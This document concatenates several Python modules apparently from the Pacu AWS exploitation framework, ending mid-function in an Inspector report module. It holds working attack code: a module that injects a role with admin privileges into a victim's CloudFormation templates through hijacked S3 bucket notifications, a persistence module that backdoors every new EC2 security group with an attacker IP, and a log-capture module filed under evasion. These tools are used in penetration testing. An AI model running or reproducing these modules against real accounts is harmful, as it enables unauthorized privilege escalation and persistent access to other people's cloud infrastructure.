        This module is designed to make use of a secondary account where you have full access. This is where the
        lambda is deployed and it eliminates the need to have the permissions necessary in the target account to
        run lambda deploys. The credentials for this account should be specified with the '--attacker-key' argument.

        The '--s3-access-key' should have GetObject, PutObject, PutBucketNotification, and GetBucketNotification
        permissions to the targeted S3 bucket. This credential will be used to set up notifications on the targeted
        S3 bucket as well as hardcoded in the lambda during deployment and used to read and write templates when
        triggered.

        Optionally you can split the PutBucketNotification and GetBucketNotification permissions out into a separate
        key using '--s3-notifications-setup-key'. If this is not specified it's assumed that '--s3-access-key' has
        the necessary permissions.

        A specific bucket can be targeted with the '--bucket' argument. If this is not specified Pacu will attempt
        to enumerate 'cf-template-*' buckets and prompt for the target bucket.
    '''.strip(),
    'services': ['CloudFormation'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': [
        '--delete',
        '--attacker-key',
        '--s3-access-key',
        '--s3-notifications-setup-key',
        '--bucket',
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--principal', help='''
    The principal to set in the injected roles trust policy. If the attack succeeds this user/role will be able to
    assume the newly created role which has admin privileges. Defaults to the root principal for the account used
    for the --attacker-key.

    Example: arn:aws:iam::123456789012:role/example.
'''.strip())

parser.add_argument('--delete', action='store_true', help='Delete an existing deployment.')
parser.add_argument('--attacker-key', required=True,
                    help='Pacu key name to use for the attacker account when deploying the lambda function.')
parser.add_argument('--s3-access-key', required=True,
                    help='Pacu key name to use for the deployed lambda function to access S3 in the victim account '
                         'account.')
parser.add_argument('--s3-notifications-setup-key',
                    help='Pacu key name to use for configuring the victims S3 buckets to send notifications to our '
                         'lambda function. If this is not specified the s3-access-key credentials will be used for '
                         'this instead.')
parser.add_argument('--bucket', help=' The S3 Bucket name to target, this is usually something like cf-templates-*.')

LAMBDA_NAME = "cfn__resource_injection_lambda-dev-update_template"


def get_bucket_name(s3: 'mypy_boto3_s3.ServiceResource', lambda_dir: 'Path') -> str:
    try:
        buckets = [b for b in s3.buckets.all() if b.name.startswith('cf-templates')]
    except botocore.exceptions.ClientError as e:
        if e.response['Error']['Code'] == 'AccessDenied':
            raise PacuException('Bucket discovery failed. If you know the S3 bucket you want to target specify the '
                                '`--bucket` argument when running this module.')
        else:
            raise e

    if not buckets:
        raise PacuException("No 'cf-templates-*' S3 buckets found.")

    print("Discovered S3 cf-template buckets:")
    for i, bucket in enumerate(buckets):
        if (lambda_dir/bucket.name/'.deployed').exists():
            print(f"{i}) {bucket.name} (deployed)")
        else:
            print(f"{i}) {bucket.name}")

    while True:
        selection = input("Select a S3 Bucket to target: ")
        try:
            return buckets[int(selection)].name
        except (ValueError, IndexError):
            print("Invalid selection")


def get_region(bucket, valid_regions) -> str:
    try:
        region = '-'.join(bucket.split('-')[-3:])
    except IndexError:
        region = None

    if region not in valid_regions:
        print('Could not determine the region from the bucket.')
        region = prompt(valid_regions, "Enter the region of the selected bucket: ")

    return region


def prompt(options, msg: str, opt_print_func=lambda o: o) -> str:
    for i, opt in enumerate(options):
        print(f"{i}) {opt_print_func(opt)}")

    while True:
        selection = input(msg)
        try:
            return options[int(selection)]
        except (ValueError, IndexError):
            print("Invalid selection")


def get_account_id(sess: 'boto3.Session'):
    return sess.client('sts').get_caller_identity()['Account']


# Main is the first function that is called when this module is executed.
def main(args, pacu_main: 'Main'):
    args = parser.parse_args(args)
    print = pacu_main.print

    # Default to using the s3_access_key if s3_notifications_setup_key is not provided.
    if args.s3_notifications_setup_key:
        s3_notifications_setup_key = args.s3_notifications_setup_key
    else:
        s3_notifications_setup_key = args.s3_access_key

    attacker_sess = get_session_from_key_name(pacu_main, args.attacker_key)
    account_id = get_account_id(attacker_sess)
    principal = args.principal or f"arn:aws:iam::{account_id}:root"
    if not principal:
        print("Must use the --principal argument to specify which user we want to be able to elevate permissions.")

    lambda_dir = (module_data_dir(pacu_main.running_module_names[-1])/'cfn__resource_injection_lambda')

    if args.bucket:
        bucket = args.bucket
    else:
        sess = get_aws_key_by_name(pacu_main, args.s3_access_key, 'us-east-1')
        bucket = get_bucket_name(sess.resource('s3'), lambda_dir)

    deploy_key: 'AWSKey' = pacu_main.get_aws_key_by_alias(args.attacker_key)
    if not deploy_key:
        print(f"Did not find the key {args.attacker_key} in pacu, make sure to set this with `set_keys` first.")

    env = lambda_env(pacu_main, bucket, deploy_key)

    deploy_dir = (lambda_dir / bucket)
    if args.delete:
        delete_lambda(deploy_dir, env)
    else:
        principal = principal
        s3_access_key: 'AWSKey' = pacu_main.get_aws_key_by_alias_from_db(args.s3_access_key)
        deploy_lambda(pacu_main, env, deploy_dir, bucket, principal, s3_access_key)

    region = get_region(bucket, pacu_main.get_regions('lambda'))
    s3_notifications_sess = get_aws_key_by_name(pacu_main, s3_notifications_setup_key, region)

    # No need to remove this on args.delete since we are deleting the lambda either way.
    if not args.delete:
        bucket_account = get_account_id(s3_notifications_sess)
        add_lambda_permission(attacker_sess, bucket_account, bucket, LAMBDA_NAME)

    if args.delete:
        remove_bucket_notification(s3_notifications_sess, bucket)
    else:
        lambda_account = get_account_id(attacker_sess)
        lambda_arn = f"arn:aws:lambda:{attacker_sess.region_name}:{lambda_account}:function:{LAMBDA_NAME}"
        put_bucket_notification(s3_notifications_sess, bucket, lambda_arn)

    if args.delete:
        msg = "Successfully deleted deployment."
    else:
        msg = f"""
Deployment successful.

After a modified CloudFormation template is successfully deployed in the target account there will be a new role
created with admin privileges that can be assumed from the '{principal}' principal.

This role name is randomly chosen by CloudFormation but will have 'MaintenanceRole' in the name. It is possible to
to explicitly set this name if needed however this is not supported at the moment.

"""
    return msg


def lambda_env(pacu: 'Main', bucket: str, key: 'AWSKey'):
    env = {
        "AWS_ACCESS_KEY_ID": key.access_key_id,
        "AWS_SECRET_ACCESS_KEY": key.secret_access_key,
        "PATH": os.environ["PATH"],
    }
    if key.session_token:
        env["AWS_SESSION_TOKEN"] = key.session_token
    env["AWS_DEFAULT_REGION"] = get_region(bucket, pacu.get_regions('lambda'))
    return env


def deploy_lambda(pacu: 'Main', env: dict, deploy_dir: Path, bucket: str, principal: str, s3_key: 'AWSKey'):
    print = pacu.print

    print(f"Will deploy lambda to {env['AWS_DEFAULT_REGION']}")
    if not deploy_dir.exists():
        shutil.copytree((Path(__file__).parent / 'cfn__resource_injection_lambda'), deploy_dir, dirs_exist_ok=False)

    config_path = deploy_dir / '.chalice' / 'config.json'
    config = json.loads(config_path.read_text())
    config['stages']['dev']['environment_variables']['PRINCIPAL'] = principal
    config['stages']['dev']['environment_variables']['BUCKET'] = bucket
    config['stages']['dev']['environment_variables']['S3_AWS_ACCESS_KEY_ID'] = s3_key.access_key_id
    config['stages']['dev']['environment_variables']['S3_AWS_SECRET_ACCESS_KEY'] = s3_key.secret_access_key
    if s3_key.session_token:
        config['stages']['dev']['environment_variables']['S3_AWS_SESSION_TOKEN'] = s3_key.session_token
    config_path.write_text(json.dumps(config))

    cmd = ['chalice', '--project-dir', str(deploy_dir), 'deploy']
    print(f"Running command: {' '.join(cmd)}")
    try:
        subprocess.check_call(cmd, env=env)
    except subprocess.CalledProcessError as e:
        # The deploy will fail when attempting to add the trigger to the cross account bucket because we're using the
        # keys for the attacker account. This is ok as long as the resource permissions get added to the deployed
        # lambda.
        if e.returncode == 2:
            pass
        else:
            raise e
    (deploy_dir / '.deployed').touch(exist_ok=True)


def delete_lambda(bucket_lambda_dir, env):
    if not bucket_lambda_dir.exists():
        raise UserWarning(f"The directory {str(bucket_lambda_dir)} does not exist.")
    subprocess.check_call(['chalice', '--project-dir', str(bucket_lambda_dir), 'delete'], env=env)
    shutil.rmtree(bucket_lambda_dir)


def get_session_from_key_name(pacu_main: 'Main', key_name: str, region: str = 'us-east-1'):
    key: 'AWSKey' = pacu_main.get_aws_key_by_alias(key_name)
    if not key:
        raise PacuException(f"Did not find the key {key_name} in pacu, make sure to set this with `set_keys` first.")

    return boto3.Session(
        region_name=region,
        aws_access_key_id=key.access_key_id,
        aws_secret_access_key=key.secret_access_key,
        aws_session_token=key.session_token,
    )


def get_aws_key_by_name(pacu_main: 'Main', key_name: str, region: str = 'us-east-1'):
    key: 'AWSKey' = pacu_main.get_aws_key_by_alias_from_db(key_name)
    if not key:
        raise PacuException(f"Did not find the key {key_name} in pacu, make sure to set this with `set_keys` first.")

    return boto3.Session(
        region_name=region,
        aws_access_key_id=key.access_key_id,
        aws_secret_access_key=key.secret_access_key,
        aws_session_token=key.session_token,
    )    


def put_bucket_notification(sess: 'boto3.Session', bucket: str, lambda_arn: str):
    s3 = sess.client('s3')
    resp = s3.get_bucket_notification_configuration(Bucket=bucket)
    conf = remove_our_notification(resp)
    conf.setdefault('LambdaFunctionConfigurations', []).append({
        'Id': 'cfn_notifications',
        'LambdaFunctionArn': lambda_arn,
        'Events': [
            's3:ObjectCreated:*',
        ],
    })
    try:
        s3.put_bucket_notification_configuration(
            Bucket=bucket,
            NotificationConfiguration=conf
        )
    except ClientError as e:
        if 'Cannot have overlapping suffixes' in e.response['Error']['Code']:
            raise PacuException(
                "\n\n*****\n"
                "There appears to already be a event configuration set up on this bucket with the same event type."
                "\n*****\n\n"
                "S3 only allows configuring a single notification configuration for each event type. It's possible "
                "that this was left around by a previous run of pacu, if this is the case you can try removing it and "
                "re-running this module.\n"
            )
        else:
            raise e


def remove_bucket_notification(sess: 'boto3.Session', bucket: str):
    s3 = sess.client('s3')
    resp = s3.get_bucket_notification_configuration(Bucket=bucket)
    resp = remove_our_notification(resp)

    s3.put_bucket_notification_configuration(
        Bucket=bucket,
        NotificationConfiguration=resp,
    )


def remove_our_notification(resp: 'NotificationConfigurationResponseMetadataTypeDef') -> \
        'NotificationConfigurationTypeDef':
    del resp['ResponseMetadata']
    resp = cast('NotificationConfigurationTypeDef', resp)
    for conf in resp.get('LambdaFunctionConfigurations', []):
        if conf['Id'] == 'cfn_notifications':
            resp['LambdaFunctionConfigurations'].remove(conf)
    return resp


def add_lambda_permission(sess, bucket_account, bucket, lambda_name):
    lambda_attacker = sess.client('lambda')
    try:
        lambda_attacker.add_permission(
            FunctionName=lambda_name,
            StatementId='cfn_notifications',
            Action='lambda:InvokeFunction',
            Principal='s3.amazonaws.com',
            SourceArn=f"arn:aws:s3:::{bucket}",
            SourceAccount=bucket_account,
        )
    except ClientError as e:
        if e.response['Error']['Code'] == 'ResourceConflictException':
            pass
        else:
            raise e


def remove_lambda_permission(sess: 'boto3.Session', lambda_name: str):
    lambda_attacker: 'mypy_boto3_lambda.Client' = sess.client('lambda')
    lambda_attacker.remove_permission(
        FunctionName=lambda_name,
        StatementId='cfn_notifications',
    )


def summary(data, pacu_main):
    return data




#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from copy import deepcopy
from pathlib import Path
import random
import string
import os

from pacu.core.lib import module_data_dir
from pacu.utils import zip_file

module_info = {
    'name': 'lambda__backdoor_new_sec_groups',

    'author': 'Spencer Gietzen of Rhino Security Labs based on code from Daniel Grzelak (https://github.com/dagrz/aws_pwn/blob/master/persistence/backdoor_created_security_groups_lambda/backdoor_created_security_groups_lambda.py)',

    'category': 'PERSIST',

    'one_liner': 'Creates a Lambda function and CloudWatch Events rule to backdoor new EC2 security groups.',

    'description': 'This module creates a new Lambda function and an accompanying CloudWatch Events rule that will trigger upon a new EC2 security group being created in the account. The function will automatically add a backdoor rule to that security group with your supplied IP address as the source. Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in the region it was deployed to.',

    'services': ['Lambda', 'Events', 'EC2'],

    'prerequisite_modules': ['iam__enum_users_roles_policies_groups'],

    'external_dependencies': [],

    'arguments_to_autocomplete': ['--regions', '--ip-range', '--port-range', '--protocol', '--cleanup'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions to create the backdoor Lambda function in, in the format "us-east-1". Defaults to all session regions.')
parser.add_argument('--ip-range', required=False, default=None, help='The IP range to allow backdoor access to. This would most likely be your own IP address in the format: 127.0.0.1/32')
parser.add_argument('--port-range', required=False, default='0-65535', help='The port range to give yourself access to in the format: starting-ending (ex: 200-800). By default, all ports are allowed (0-65535).')
parser.add_argument('--protocol', required=False, default='tcp', help='The protocol for the IP range specified. Options are: TCP, UDP, ICMP, or ALL. The default is TCP. WARNING: When supplying ALL, AWS will automatically allow traffic on all ports, regardless of the range specified. More information is available here: https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.authorize_security_group_ingress')
parser.add_argument('--cleanup', required=False, default=False, action='store_true', help='Run the module in cleanup mode. This will remove any known backdoors that the module added from the account.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ######
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    get_regions = pacu_main.get_regions
    fetch_data = pacu_main.fetch_data

    MODULE_PATH = Path(__file__).parent
    MODULE_SESSION_PATH = module_data_dir(module_info['name'])
    CREATED_LAMBDA_FUNCTIONS_PATH = MODULE_SESSION_PATH/'created-lambda-functions.txt'
    CREATED_CLOUDWATCH_EVENTS_RULES_PATH = MODULE_SESSION_PATH/'created-cloudwatch-events-rules.txt'
    LAMBDA_FUNCTION_ZIP_PATH = MODULE_SESSION_PATH/'lambda_function.zip'
    ######

    if args.cleanup:
        created_lambda_functions = []
        created_cwe_rules = []

        if CREATED_LAMBDA_FUNCTIONS_PATH.is_file():
            with open(CREATED_LAMBDA_FUNCTIONS_PATH, 'r') as f:
                created_lambda_functions = f.readlines()
        if CREATED_CLOUDWATCH_EVENTS_RULES_PATH.is_file():
            with open(CREATED_CLOUDWATCH_EVENTS_RULES_PATH, 'r') as f:
                created_cwe_rules = f.readlines()

        if created_lambda_functions:
            delete_function_file = True
            for function in created_lambda_functions:
                name, region = function.rstrip().split('@')
                print('  Deleting function {} in region {}...'.format(name, region))
                client = pacu_main.get_boto3_client('lambda', region)
                try:
                    client.delete_function(
                        FunctionName=name
                    )
                except ClientError as error:
                    code = error.response['Error']['Code']
                    if code == 'AccessDeniedException':
                        print('  FAILURE: MISSING NEEDED PERMISSIONS')
                    else:
                        print(code)
                    delete_function_file = False
                    break
            if delete_function_file:
                try:
                    os.remove(CREATED_LAMBDA_FUNCTIONS_PATH)
                except Exception as error:
                    print(f'  Failed to remove {CREATED_LAMBDA_FUNCTIONS_PATH}')
                    print('    {}: {}'.format(type(error), error))

        if created_cwe_rules:
            delete_cwe_file = True
            for rule in created_cwe_rules:
                name, region = rule.rstrip().split('@')
                print('  Deleting rule {} in region {}...'.format(name, region))
                client = pacu_main.get_boto3_client('events', region)
                try:
                    client.remove_targets(
                        Rule=name,
                        Ids=['0']
                    )
                    client.delete_rule(
                        Name=name
                    )
                except ClientError as error:
                    code = error.response['Error']['Code']
                    if code == 'AccessDeniedException':
                        print('  FAILURE: MISSING NEEDED PERMISSIONS')
                    else:
                        print(code)
                    delete_cwe_file = False
                    break
            if delete_cwe_file:
                try:
                    os.remove(CREATED_CLOUDWATCH_EVENTS_RULES_PATH)
                except Exception as error:
                    print('  Failed to remove {CREATED_CLOUDWATCH_EVENTS_RULES_PATH}')
                    print('    {}: {}'.format(type(error), error))

        print('Completed cleanup mode.\n')
        return {'cleanup': True}

    if not args.ip_range:
        print('  --ip-range is required if you are not running in cleanup mode!')
        return

    data = {'functions_created': 0, 'rules_created': 0, 'successes': 0}

    created_resources = {'LambdaFunctions': [], 'CWERules': []}

    if not args.regions:
        regions = get_regions('Lambda')
    else:
        regions = args.regions.split(',')

    from_port, to_port = args.port_range.split('-')

    target_role_arn = input('  What role should be used? Note: The role should allow Lambda to assume it and have at least the EC2 AuthorizeSecurityGroupIngress permission. Enter the ARN now or just press enter to enumerate a list of possible roles to choose from: ')
    if not target_role_arn:
        if fetch_data(['IAM', 'Roles'], module_info['prerequisite_modules'][0], '--roles', force=True) is False:
            print('Pre-req module not run successfully. Exiting...')
            return None
        roles = deepcopy(session.IAM['Roles'])

        print('Found {} roles. Choose one below.'.format(len(roles)))
        for i in range(0, len(roles)):
            print('  [{}] {}'.format(i, roles[i]['RoleName']))
        choice = input('Choose an option: ')
        target_role_arn = roles[int(choice)]['Arn']

    # Import the Lambda function and modify the variables it needs
    with open(MODULE_PATH/'lambda_function.py.bak', 'r') as f:
        source_code = f.read()

    source_code = source_code.replace('FROM_PORT', from_port).replace('TO_PORT', to_port).replace('IP_RANGE', args.ip_range).replace('IP_PROTOCOL', args.protocol)

    # Zip the Lambda function
    try:
        print('  Zipping the Lambda function...\n')
        zip_data = {'lambda_function.py': source_code}
        zip_file_bytes = zip_file(LAMBDA_FUNCTION_ZIP_PATH, zip_data)
    except Exception as error:
        print('Failed to zip the Lambda function locally: {}\n'.format(error))
        return data

    for region in regions:
        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('lambda', region)

        try:
            function_name = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(15))
            response = client.create_function(
                FunctionName=function_name,
                Runtime='python3.9',
                Role=target_role_arn,
                Handler='lambda_function.lambda_handler',
                Code={
                    'ZipFile': zip_file_bytes
                }
            )
            lambda_arn = response['FunctionArn']
            print('  Created Lambda function: {}'.format(function_name))
            data['functions_created'] += 1
            created_resources['LambdaFunctions'].append('{}@{}'.format(function_name, region))

            client = pacu_main.get_boto3_client('events', region)

            response = client.put_rule(
                Name=function_name,
                EventPattern='{"source":["aws.ec2"],"detail-type":["AWS API Call via CloudTrail"],"detail":{"eventSource":["ec2.amazonaws.com"],"eventName":["CreateSecurityGroup"]}}',
                State='ENABLED'
            )
            print('  Created CloudWatch Events rule: {}'.format(response['RuleArn']))
            data['rules_created'] += 1

            client = pacu_main.get_boto3_client('lambda', region)

            client.add_permission(
                FunctionName=function_name,
                StatementId=''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10)),
                Action='lambda:InvokeFunction',
                Principal='events.amazonaws.com',
                SourceArn=response['RuleArn']
            )

            client = pacu_main.get_boto3_client('events', region)

            response = client.put_targets(
                Rule=function_name,
                Targets=[
                    {
                        'Id': '0',
                        'Arn': lambda_arn
                    }
                ]
            )
            if response['FailedEntryCount'] > 0:
                print('Failed to add the Lambda function as a target to the CloudWatch rule. Failed entries:')
                print(response['FailedEntries'])
            else:
                print('  Added Lambda target to CloudWatch Events rule.')
                data['successes'] += 1
                created_resources['CWERules'].append('{}@{}'.format(function_name, region))
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'AccessDeniedException':
                print('  FAILURE: MISSING NEEDED PERMISSIONS')
            else:
                print(code)

    if created_resources['LambdaFunctions']:
        with open(CREATED_LAMBDA_FUNCTIONS_PATH, 'w+') as f:
            f.write('\n'.join(created_resources['LambdaFunctions']))
    if created_resources['CWERules']:
        with open(CREATED_CLOUDWATCH_EVENTS_RULES_PATH, 'w+') as f:
            f.write('\n'.join(created_resources['CWERules']))

    print('Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in the region it was deployed to.')

    return data


def summary(data, pacu_main):
    if data.get('cleanup'):
        return '  Completed cleanup of Lambda functions and CloudWatch Events rules.'

    return '  Lambda functions created: {}\n  CloudWatch Events rules created: {}\n  Successful backdoor deployments: {}\n'.format(data['functions_created'], data['rules_created'], data['successes'])



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import datetime


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'aws__enum_account',

    # Name and any other notes about the author
    'author': 'Chris Farris <chris@room17.com>',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates data About the account itself.',

    # Full description about what the module does and how it works
    'description': 'Determines information about the AWS account itself.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['IAM'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': [],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])


# Main is the first function that is called when this module is executed
def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    ######

    sts_client = pacu_main.get_boto3_client('sts')
    response = sts_client.get_caller_identity()
    key_arn = response['Arn']
    account_id = response['Account']

    iam_client = pacu_main.get_boto3_client('iam')
    try:
        response = iam_client.list_account_aliases()
        account_iam_alias = response['AccountAliases'][0]
    except (KeyError, IndexError):
        account_iam_alias = "<No IAM Alias defined>"
    except ClientError as e:
        print("ClientError has occurred when getting AccountAliases: {}".format(e))
        account_iam_alias = "<NotFound>"

    print('Enumerating Account: {}'.format(account_iam_alias))
    # All the billing seems to be in us-east-1. YMMV
    cwm_client = pacu_main.get_boto3_client('cloudwatch', "us-east-1")
    try:
        response = cwm_client.get_metric_statistics(
            Namespace='AWS/Billing',
            MetricName='EstimatedCharges',
            Dimensions=[
                {
                    'Name': 'Currency',
                    'Value': 'USD'
                },
            ],
            StartTime=datetime.datetime.now() - datetime.timedelta(hours=6),
            EndTime=datetime.datetime.now(),
            Period=21600,  # 6 hours
            Statistics=['Maximum'],
            Unit='None'
        )
        if len(response['Datapoints']) == 0:
            account_spend = "unavailable"
        elif 'Maximum' not in response['Datapoints'][0]:
            account_spend = "unavailable"
        else:
            account_spend = response['Datapoints'][0]['Maximum']
    except ClientError as e:
        if e.response['Error']['Code'] == "AccessDenied":
            account_spend = "<unauthorized>"
        else:
            print("Unable to get Spend Data: {}".format(e))
            account_spend = "<ClientError>"

    try:
        org_client = pacu_main.get_boto3_client('organizations')
        org_response = org_client.describe_organization()
        org_data = org_response['Organization']
    except ClientError as e:
        org_data = {}
        if e.response['Error']['Code'] == "AccessDeniedException":
            org_data['error'] = "Not Authorized to get Organization Data"
        else:
            print("Unable to get Organization Data: {}".format(e))
            org_data['error'] = "Error Getting Organization Data"

    account_data = {
        'account_id': account_id,
        'account_iam_alias': account_iam_alias,
        'account_total_spend': account_spend,
        'org_data': org_data
    }

    session.update(pacu_main.database, Account=account_data)

    summary_data = {
        'key_arn': key_arn,
        **account_data
    }
    return summary_data


def summary(data, pacu_main):
    out = "Account Information:\n"
    out += "    Account ID: {}\n".format(data['account_id'])
    out += "    Account IAM Alias: {}\n".format(data['account_iam_alias'])
    out += "    Key Arn: {}\n".format(data['key_arn'])
    out += "    Account Spend: {} (USD)\n".format(data['account_total_spend'])
    if data.get('org_data', None) is not None:
        out += "    Parent Account:\n"
        for key in data['org_data'].keys():
            out += "        {}: {}\n".format(key, data['org_data'][key])
    return out



#!/usr/bin/env python3
import argparse
import csv
import datetime
import os

from botocore.exceptions import ClientError

from pacu.core.lib import save, strip_lines, downloads_dir
from pacu import Main

module_info = {
    'name': 'cloudwatch__download_logs',
    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',
    'category': 'EVADE',
    'one_liner': 'Captures CloudWatch logs and downloads them to the session downloads folder',
    'description': strip_lines('''
        This module examines all logs for all regions and saves them as CSV files. By default, only events that were
        logged in the past 24 hours will be captured. Otherwise, they will be captured based on the passed time
        arguments. The files will be downloaded in a similar format to
        ~/.local/share/pacu/sessions/{session}/downloads/cloud_watch_logs/{timestamp}, with session being the active session, and
        timestamp being the start of this module's execution.
    '''),
    'services': ['logs'],
    'external_dependencies': [],
    'arguments_to_autocomplete': [
        '--from-time',
        '--to-time',
        '--regions'
    ],
}
DEFAULT_FROM_TIME = datetime.datetime.today().replace(tzinfo=datetime.timezone.utc) - datetime.timedelta(days=1)

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument(
    '--from-time',
    required=False,
    default=DEFAULT_FROM_TIME,
    help='Download logs from time format "yyyy[-mm[-dd-[hh-mm-ss]]]". Unfilled fields will assume earliest possible time'
)
parser.add_argument(
    '--to-time',
    required=False,
    default=None,
    help='Download logs up to and not including time format "yyyy[-mm[-dd-[hh-mm-ss]]]". Unfilled fields will assume earliest possible time'
)
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')


def parse_time(time):
    time_fields = [int(field) for field in time.split('-')]
    # Fill missing month and day.
    if len(time_fields) == 1:
        time_fields.append(1)
        time_fields.append(1)
    # Fill missing day.
    elif len(time_fields) == 2:
        time_fields.append(1)
    return datetime.datetime(*time_fields).replace(tzinfo=datetime.timezone.utc)


def write_stream_file(session_name, scan_time, group_name, stream_name, events):
    if not events:
        return True
    stream_group_path = os.path.join('cloud_watch_logs', str(scan_time), group_name[1:])
    file_name = os.path.join(stream_group_path, stream_name.replace('/', '_') + '.csv')

    with save(file_name, 'a', newline='') as f:
        event_writer = csv.writer(f, delimiter=',')
        for event in events:
            event_writer.writerow([event['timestamp'], event['message']])
    return True


def collect_all(client, func, key, **kwargs):
    """Collects data and stores it in a list."""
    caller = getattr(client, func)
    try:
        response = caller(**kwargs)
        out = response[key]
        while 'nextToken' in response:
            response = caller(**{'nextToken': response['nextToken'], **kwargs})
            out += response[key]
        return out
    except ClientError as error:
        if error.response['Error']['Code'] == 'AccessDeniedException':
            print('AccessDenied for: {}'.format(func))
    return []


def millisecond(time_stamp):
    """Returns millisecond from timestamp"""
    return int(time_stamp.timestamp() * 1000 + time_stamp.microsecond / 1000)


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    summary_data = {}


    if args.regions is None:
        regions = get_regions('logs')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    if isinstance(args.from_time, str):
        from_time = parse_time(args.from_time)
    else:
        from_time = DEFAULT_FROM_TIME
    if isinstance(args.to_time, str):
        to_time = parse_time(args.to_time)

    scan_time = int(datetime.datetime.now().timestamp())
    log_groups = {}
    for region in regions:
        print('Enumerating {}...'.format(region))
        client = pacu_main.get_boto3_client('logs', region)
        groups = collect_all(client, 'describe_log_groups', 'logGroups')
        if not groups:
            print('  No Log Groups found')
            continue
        else:
            print('  {} Log Groups found'.format(len(groups)))
        group_names = [group['logGroupName'] for group in groups]
        for group in group_names:
            log_groups[group] = {}

        for log_group in log_groups:
            streams = collect_all(
                client, 'describe_log_streams', 'logStreams',
                **{'logGroupName': log_group})
            log_groups[log_group] = [stream['logStreamName'] for stream in streams]
        if not streams:
            print(' No Streams found')
            continue
        else:
            stream_count = sum([len(log_groups[key]) for key in log_groups])
            print('  {} Streams found'.format(stream_count))
        event_count = 0
        for group in log_groups:
            for stream in log_groups[group]:
                start_time = millisecond(from_time)
                end_time = millisecond(to_time) if args.to_time else None
                kwargs = {
                    'logGroupName': group,
                    'logStreamNames': [stream],
                    'startTime': start_time,
                }
                if end_time:
                    kwargs['endTime'] = end_time

                paginator = client.get_paginator('filter_log_events')
                page_iterator = paginator.paginate(**kwargs)
                for response in page_iterator:
                    event_count += len(response['events'])
                    write_stream_file(
                        session.name, scan_time, group, stream,
                        response['events'])
                print('    Captured Events for {}'.format(stream))
        summary_data[region] = {
            'groups': len(log_groups),
            'streams': sum([len(log_groups[key]) for key in log_groups]),
            'events': event_count,
        }
    dl_root = str(downloads_dir()) + '/cloud_watch_logs/'
    summary_data['log_download_path'] = '{}{}'.format(dl_root, scan_time)
    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'log_download_path' in data:
        out += 'Logs downloaded to: {}\n'.format(data['log_download_path'])
        del data['log_download_path']
    for region in data:
        out += '  {}:\n'.format(region)
        for key in data[region]:
            out += '    {}:{}\n'.format(key, data[region][key])
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import os
import urllib.request

from pacu.core.lib import strip_lines, save, downloads_dir
from pacu import Main

module_info = {
    'name': 'inspector__get_reports',
    'author': 'Alexander Morgenstern',
    'category': 'ENUM',
    'one_liner': 'Captures vulnerabilities found when running a preconfigured inspector report.',
    'description': strip_lines('''
        This module captures findings for reports in regions that support AWS Inspector. The optional argument
        --download-reports will automatically download any reports found into the session downloads directory under a
        folder named after the run id of the inspector report.
    '''),
    'services': ['Inspector'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': [
        '--download-reports'
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--download-reports', required=False, default=False, action='store_true',
                    help='Optional argument to download HTML reports for each run')


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print

    get_regions = pacu_main.get_regions

    regions = get_regions('Inspector')
    complete_data = {}
    summary_data = {
        'reports': 0,
        'findings': 0,
        'regions': regions,
    }
    if args.download_reports:
        summary_data['reports_location'] = downloads_dir()/'inspector_assessments/'
    for region in regions:
        print('Starting region {}...'.format(region))

        client = pacu_main.get_boto3_client('inspector', region)

        if args.download_reports:
            assessment_runs = []
            response = ''
            try:
                response = client.list_assessment_runs()
                assessment_runs += response['assessmentRunArns']
                while 'nextToken' in response:
                    response = client.list_findings(nextToken=response['nextToken'])
                    assessment_runs += response['assessmentRunArns']
            except ClientError as error:
                    if error.response['Error']['Code'] == 'AccessDeniedException':
                        print('Access Denied for list-assessment-runs')
            if not assessment_runs:
                print('  No assessment runs found for {}'.format(region))
            else:
                summary_data['reports'] += len(assessment_runs)
            for run in assessment_runs:
                response = client.get_assessment_report(
                    assessmentRunArn=run,
                    reportFileFormat='HTML',
                    reportType='FULL'
                )
                if response.get('url'):
                    p = 'inspector_assessments/'.format(session.name) + str(run)[-10:] + '.html'
                    print('  Report saved to: ' + p)
